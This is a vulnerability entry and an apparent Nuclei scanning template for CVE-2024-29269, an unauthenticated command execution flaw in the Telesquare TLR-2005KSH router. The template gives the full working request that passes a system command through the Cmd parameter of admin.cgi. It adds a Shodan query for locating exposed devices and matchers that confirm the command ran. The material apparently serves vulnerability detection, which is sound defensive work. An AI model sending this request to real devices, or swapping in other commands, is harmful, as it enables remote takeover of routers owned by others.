Telesquare Tlr-2005Ksh is a Sk Telecom Lte router from South Korea's Telesquare company.Telesquare TLR-2005Ksh versions 1.0.0 and 1.1.4 have an unauthorized remote command execution vulnerability. An attacker can exploit this vulnerability to execute system commands without authorization through the Cmd parameter and obtain server permissions.
PoC代码[已公开]
id: CVE-2024-29269
info:
name: Telesquare TLR-2005KSH - Remote Command Execution
author: ritikchaddha
severity: critical
description: |
Telesquare Tlr-2005Ksh is a Sk Telecom Lte router from South Korea's Telesquare company.Telesquare TLR-2005Ksh versions 1.0.0 and 1.1.4 have an unauthorized remote command execution vulnerability. An attacker can exploit this vulnerability to execute system commands without authorization through the Cmd parameter and obtain server permissions.
reference:
- https://github.com/wutalent/CVE-2024-29269/blob/main/index.md
- https://gist.github.com/win3zz/c26047ae4b182c3619509d537b808d2b
- https://github.com/Ostorlab/KEV
- https://github.com/YongYe-Security/CVE-2024-29269
- https://github.com/nomi-sec/PoC-in-GitHub
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-29269
epss-score: 0.93595
epss-percentile: 0.99833
cpe: cpe:2.3:h:telesquare:tlr-2005ksh:*:*:*:*:*:*:*:*
metadata:
max-request: 1
shodan-query: title:"Login to TLR-2005KSH"
product: tlr-2005ksh
vendor: telesquare
tags: cve,cve2024,telesquare,tlr,rce,vkev
http:
- raw:
- |
GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=ifconfig HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<CmdResult>'
- '</xml>'
- 'Ethernet'
- 'inet'
condition: and
- type: word
part: header
words:
- 'text/xml'
- type: status
status:
- 200
# digest: 490a0046304402201fea14f60c774609424edec9e67e82d23190d26f7757cb4cdd3af42b3c24fd51022016c0d15126ca3597715a21e443224378b3d857cc2caf6e3ea3363f3927a869d7:922c64590222798bb761d5b6d8e72950